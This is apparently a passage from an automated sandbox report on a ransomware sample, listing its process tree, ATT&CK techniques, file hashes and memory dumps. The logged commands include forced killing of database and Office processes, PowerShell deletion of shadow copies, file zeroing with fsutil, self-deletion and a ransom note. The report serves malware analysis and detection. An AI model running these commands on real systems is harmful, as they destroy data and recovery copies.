- Suspicious use of AdjustPrivilegeToken
PID:940

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:668

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2172

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2140

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2848

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2860

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2896

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2908

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2184

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3048

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2⤵
- Deletes itself
PID:2792

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:1208

C:\Windows\system32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:2496

C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:2480

C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:2252

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:2712

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
82d8a9ee8293fd002671397619273c62

SHA1
ea835264b9ed1e7b0dedbc99456168ba99ad65ac

SHA256
1de41f5a2adcfd7bf33fe0f00fdaff4d108753c1341e298e75e3c8470dfb9138

SHA512
095474efadf52df9dd2f7df367676bec4a51de843baad8753521a7dbbad1b8a23d60ec413485bd7f91db5c6ac5328e52790f428ff08482bd0d1bbeb3278be496

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
MD5
5cad4e10da6c84ff09bf1d96741b6b0b

SHA1
d872c872d62a46257312a7ae4c34a7ef1514936e

SHA256
ccd5416ae965a2cc49ab60ed2c5e9dde831151f23c4ce11784ccb6d3f1396747

SHA512
9383fb7602cfb0aa11df91886c270d4ae12114de033d87f96f23ecdf2308389b6affe13a5afe2442e6c91df3004a3bb3df7d6ffc66e83bb4162a0c76b2fde530

Download Submit
memory/324-36-0x0000000000000000-mapping.dmp

Download
memory/364-25-0x0000000000000000-mapping.dmp

Download
memory/416-27-0x0000000000000000-mapping.dmp

Download
memory/428-39-0x0000000000000000-mapping.dmp

Download
memory/592-8-0x0000000000000000-mapping.dmp

Download
memory/604-20-0x0000000000000000-mapping.dmp

Download
memory/668-7-0x0000000000000000-mapping.dmp

Download
memory/668-42-0x0000000000000000-mapping.dmp

Download
memory/728-30-0x0000000000000000-mapping.dmp

Download
memory/740-26-0x0000000000000000-mapping.dmp

Download
memory/792-10-0x0000000000000000-mapping.dmp

Download
memory/820-24-0x0000000000000000-mapping.dmp

Download
memory/824-21-0x0000000000000000-mapping.dmp

Download
memory/840-22-0x0000000000000000-mapping.dmp

Download
memory/912-9-0x0000000000000000-mapping.dmp

Download
memory/936-32-0x0000000000000000-mapping.dmp

Download
memory/940-41-0x0000000000000000-mapping.dmp

Download
memory/1020-23-0x0000000000000000-mapping.dmp

Download
memory/1036-14-0x000000001AAD0000-0x000000001AAD2000-memory.dmp

Filesize
8KB

Download
memory/1036-3-0x0000000001340000-0x0000000001341000-memory.dmp

Filesize
4KB

Download
memory/1036-2-0x000007FEF60E0000-0x000007FEF6ACC000-memory.dmp

Filesize
9.9MB

Download
memory/1132-34-0x0000000000000000-mapping.dmp

Download
memory/1208-73-0x0000000000000000-mapping.dmp

Download
memory/1208-18-0x0000000000000000-mapping.dmp

Download
memory/1312-19-0x0000000000000000-mapping.dmp

Download
memory/1388-40-0x0000000000000000-mapping.dmp

Download
memory/1468-17-0x0000000000000000-mapping.dmp

Download
memory/1484-44-0x0000000000000000-mapping.dmp

Download
memory/1492-31-0x0000000000000000-mapping.dmp

Download
memory/1536-57-0x0000000000000000-mapping.dmp

Download
memory/1552-33-0x0000000000000000-mapping.dmp

Download
memory/1588-45-0x0000000000000000-mapping.dmp

Download
memory/1632-35-0x0000000000000000-mapping.dmp

Download
memory/1672-16-0x0000000000000000-mapping.dmp

Download
memory/1692-12-0x0000000000000000-mapping.dmp

Download
memory/1712-29-0x0000000000000000-mapping.dmp

Download
memory/1720-13-0x0000000000000000-mapping.dmp

Download
memory/1736-28-0x0000000000000000-mapping.dmp

Download
memory/1768-38-0x0000000000000000-mapping.dmp

Download
memory/1772-15-0x0000000000000000-mapping.dmp

Download
memory/1780-37-0x0000000000000000-mapping.dmp

Download
memory/1788-43-0x0000000000000000-mapping.dmp

Download
memory/1804-11-0x0000000000000000-mapping.dmp

Download
memory/1968-6-0x0000000000000000-mapping.dmp

Download
memory/1984-5-0x0000000000000000-mapping.dmp

Download
memory/2104-46-0x0000000000000000-mapping.dmp

Download
memory/2140-47-0x0000000000000000-mapping.dmp

Download
memory/2172-48-0x0000000000000000-mapping.dmp

Download
memory/2184-56-0x0000000000000000-mapping.dmp

Download
memory/2252-75-0x0000000000000000-mapping.dmp

Download
memory/2480-72-0x0000000000000000-mapping.dmp

Download
memory/2496-69-0x0000000000000000-mapping.dmp

Download
memory/2712-68-0x0000000000000000-mapping.dmp

Download
memory/2792-70-0x0000000000000000-mapping.dmp

Download
memory/2848-49-0x0000000000000000-mapping.dmp

Download
memory/2860-50-0x0000000000000000-mapping.dmp

Download
memory/2896-51-0x0000000000000000-mapping.dmp

Download
memory/2908-52-0x0000000000000000-mapping.dmp

Download
memory/2940-53-0x0000000000000000-mapping.dmp

Download
memory/2956-64-0x000000001A984000-0x000000001A986000-memory.dmp

Filesize
8KB

Download
memory/2956-65-0x0000000002550000-0x0000000002551000-memory.dmp

Filesize
4KB

Download
memory/2956-66-0x00000000023F0000-0x00000000023F1000-memory.dmp

Filesize
4KB

Download
memory/2956-63-0x000000001A980000-0x000000001A982000-memory.dmp

Filesize
8KB

Download
memory/2956-62-0x000000001AA00000-0x000000001AA01000-memory.dmp

Filesize
4KB

Download
memory/2956-61-0x0000000002510000-0x0000000002511000-memory.dmp

Filesize
4KB

Download
memory/2956-60-0x000007FEF60E0000-0x000007FEF6ACC000-memory.dmp

Filesize
9.9MB

Download
memory/2956-59-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmp

Filesize
8KB

Download
memory/2956-58-0x0000000000000000-mapping.dmp

Download
memory/2980-54-0x0000000000000000-mapping.dmp

Download
memory/3048-55-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads